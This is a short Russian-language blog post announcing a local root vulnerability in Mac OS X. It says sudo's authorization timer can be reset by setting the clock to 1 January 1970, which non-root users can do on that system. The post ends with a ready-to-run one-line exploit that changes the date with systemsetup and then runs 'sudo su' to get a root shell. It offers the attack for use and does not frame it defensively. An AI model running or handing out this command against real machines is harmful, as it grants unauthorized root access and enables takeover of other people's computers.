Критическая уязвимость в Mac OS X всех версий. Получение локального root доступа.

Что то меня поперло сегодня писать в блог =) В общем найдена критическая ошибка в Mac OS X всех версий. Всем известно, что sudo после первой авторизации устанавливает счетчик отсчета времени, поэтому после первой авторизации вы можете какое то время авторизовываться без пароля. Проблема в том, что изменив дату на 1 января 1970 года (эра Unix) Unix сбрасывает счетчик и отсчет времени авторизации sudo начинается с нуля. В Mac OS X есть возможность устанавливать дату и время без необходимых прав суперпользователя. В Linux такой проблемы нет, так как установка даты требует прав суперпользователя.

Эксплоит:

systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su